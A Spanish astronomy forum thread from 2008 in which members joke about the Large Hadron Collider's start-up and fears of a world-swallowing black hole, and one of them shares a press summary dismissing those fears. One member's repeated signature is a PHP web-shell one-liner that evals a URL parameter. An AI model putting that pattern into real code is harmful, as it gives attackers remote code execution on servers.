LCH

Preguntas básicas sobre astronomía
Responder
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

LCH

Mensaje por Manuelariza »

Hoy se apuesto en funcionamiento el LCH,el acelerador de partículas mas grande del mundo, como todos sabéis.
Me pregunto si sera capaz de crear un mini agujero negro como dicen y si es verdad( espero que no)que se trague la tierra como también dicen :? :? :?.
Estoy pensando en hacer una lista de las cosas que me quedan por hacer no sea que vaya a tragarnos una mier......... de agujero negro :twisted: :twisted: :twisted:

Saludos.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

LCH

Mensaje por rviper »

hombre, yo creo que no saben al 100% lo que va a pasar cuando se ponga a funcionar a pleno rendimiento, pero como he leido por mucho sitios, la energia o lo que se cree en los choques sera insignificante y durara tan poco que no tendra repercusion a gran escala. y si se les va de las manos supongo que tendran algun mecanismo de seguridad ¿no?

salga lo que salga, podemos estar contentos de vivir en esta epoca y ver en primera persona los resultados de los experimentos.
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

LCH

Mensaje por m3ntol »

Piensa en positivo,

a ver, al hoyo vamos a ir todos y sinceramente, la muerte por agujero negro es de lo más pintoresca que puedas imaginar.

Además, ya puestos, quizá salgamos por el otro lado de un agujero de gusano en un universo paralelo donde los políticos no mientan, la gente sea buena y los autobusas no se retrasen je, je, je.
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

LCH

Mensaje por Manuelariza »

Supongo que todo lo tienen controlado, yo simplemente hago un comentario un poco jocoso sobre tantos comentarios acerca del fin del mundo por culpa del LCH.
Aunque si pasara lo que dice m3ntol, seria estupendo. :wink: :wink:
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

LCH

Mensaje por m3ntol »

Pues no creo que lo tengan todo tan controlado porque se están adentrando en una parcela inexplorada de la física subatómica, así que no hay hechos experimentales previos, tan solo teorías que predicen la evaporación de los agujeros negros microscópicos.

Pero llegados a este punto ¿encienden o no encienden la máquina de 4000 millones? :D :D

La física experimental tiene estas cosas, si Rutherford en vez de bombardear una placa de plomo con partículas alfa hubiera tenido acceso a una cantidad suficiente de uranio pues... BOOM :D :D

Las probabilidades de que pase algo son remotas, igual que cuando mandaron aquél satélite a estrellarse contra un asteroide para estudiarlo... ¿y si hubieran hecho una carambola cósmia y tras varios rebotes se estrella contra París? posible sí, probable no.
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

LCH

Mensaje por Manuelariza »

Siempre queda la posibilidad de que la cosa salga mal, pero eso pasa en muchos aspectos de la vida, pero con este experimento se esta hablando de que pueda pasar algo muy serio, no se que pensar. :roll: :roll:
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

LCH

Mensaje por Manuelariza »

Temores apocalípticos.(COMUNICADO DE PRENSA PARA LOS INTERESADOS)
El bautizo de hoy ha sido un ensayo general en el que se ha inyectado un primer haz de protones en el acelerador, para comprobar si es capaz de recorrer sin problemas el recorrido circular del anillo. Las primeras colisiones de partículas, sin embargo, no se llevarán a cabo hasta dentro de unas semanas, una vez que los científicos del CERN comprueben que todo funciona a la perfección.

Cuando el LHC empiece a trabajar a pleno rendimiento en los próximos meses, los aproximadamente 10.000 científicos de unos 500 centros de investigación que participan en el proyecto van a tener mucho trabajo. Se calcula que cada año, el acelerador de partículas producirá tantos datos que se necesitaría una pila de CD de una altura de 20 kilómetros para almacenar toda la información generada por sus experimentos.

La inauguración del LHC podía haberse suspendido, sin embargo, si el Tribunal de Derechos Humanos de Estrasburgo se hubiera tomado en serio la demanda interpuesta por un grupo de físicos que a finales de agosto exigieron la paralización del proyecto, al considerar que el acelerador de partículas representaba una gravísima amenaza para la Humanidad. Según estos iluminados, el LHC podría desencadenar un pequeño agujero negro con consecuencias apocalípticas, ya que la Tierra acabaría literalmente engullida por este sumidero cósmico.

A pesar de que la teoría era totalmente extravagante, y el Tribunal de Estrasburgo desestimó la demanda, el CERN se vio obligado a emitir un comunicado de prensa el pasado viernes para tranquilizar a todos aquellos que sigan temiendo que el fin del mundo se acerca. Con todo esto Aymar ha querido zanjar la polémica con rotundidad: "El LHC es seguro y cualquier sugerencia de que sea peligroso es pura ficción".
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

LCH

Mensaje por rviper »

Por si alguien no se habia enterado todavia han activado un enlace a las webcam del LHC Compact Muon Solenoid Experiment

Como los enlaces están saturados es posible que tengais que actualizar la conexión haciendo clic en los cuadros.

http://www.cyriak.co.uk/lhc/lhc-webcams.html
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

LCH

Mensaje por m3ntol »

:lol: :lol: :lol: :lol: :lol:
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

LCH

Mensaje por Manuelariza »

Muy bueno.... :lol: :lol:
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Responder